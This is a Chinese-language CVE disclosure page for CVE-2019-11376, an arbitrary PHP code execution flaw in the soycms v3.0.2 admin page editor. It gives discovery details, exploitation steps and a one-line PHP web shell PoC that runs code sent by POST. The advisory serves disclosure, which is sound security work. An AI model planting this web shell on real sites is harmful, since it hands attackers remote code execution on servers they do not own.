CVE中文申请站

CVE-2019-11376:soycms v3.0.2任意php代码执行

一、漏洞摘要

漏洞名称: soycms v3.0.2任意php代码执行
上报日期: 2019-04-08
漏洞发现者: Yu Yang
产品首页: https://saitodev.co/soycms/
软件链接: https://github.com/inunosinsi/soycms
版本: v3.0.2
CVE编号: CVE-2019-11376


二、漏洞概述

soycms v3.0.2后台网页编辑功能过滤不严格,导致在后台更改的代码中可以带入php代码造成代码执行。

三、利用方法

1.首先我们成功安装该cms,并进入后台,可以对网页进行编辑,此处编辑index,php
1.png
我们能插入任意的PHP代码进入网页,并保存到http://xxx.xxx.xxx/'New directory'/index.php,如上图所示,我们插入的代码为:<?php phpinfo();?>
2.png
插入之后,代码都可以成功执行,所以我们可以插入恶意代码并getshell
3.png
poc:<?php @eval($_POST[c]);?>

四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/212/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11376
exploit-db:发布中